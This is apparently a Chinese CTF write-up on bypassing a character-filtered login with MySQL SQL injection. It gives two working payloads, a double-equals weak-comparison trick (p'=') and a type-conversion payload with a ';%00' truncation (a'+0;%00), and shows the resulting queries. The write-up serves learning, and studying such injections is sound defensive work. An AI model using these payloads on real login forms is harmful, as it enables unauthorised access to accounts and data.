这个题过滤了绝大多数东西,然而留下了最关键的单引号。
但真只剩下单引号可用了还真搞不定,参考别人wp后学到了两种方法:
(1)双等号绕过。
假设sql语句如下:
select * from user where username='用户名' and password='密码'
现在我们知道单引号和等号没有被过滤(这个题目是只过滤指定字符,测试一下就知道哪些被过滤了),那么可以用一下payload:
username=p'='&password=p'='
带入到sql语句可以看到就变成了:
select * from user where username='p'='' and password='p'=''
先看前面username那一块,由于两个等号是从左往右计算的,username=‘p’不存在就会返回0(false),而0=''则会返回1,这样where后面计算结果就变成了1 and 1,这样最后就会把数据表中所有的数据挑出来。
sql里面弱类型的比较,以下情况都会为true:
1='1'
1='1.0'
1='1后接字母(再后面有数字也可以)'
0='除了非0数字开头的字符串'
(2)利用mysql数据类型转换特性以及特殊截断符号“%00;”:
select * from table where username=0;
select * from table where username='a'+0;
这两句均会返回库中所有元组,就是说如果一个字符类型的变量接收到一个整形变量且值为0的时候,就会返回库中所有元组(第二句'a'+0会进行强制类型转换,最后结果还是0)
其次,mysql的注释符号除了-- + , # ,/**/之外,还有;%00。
利用这两点,构造如下payload:
username=a'+0;%00&password=
就可以成功绕过了。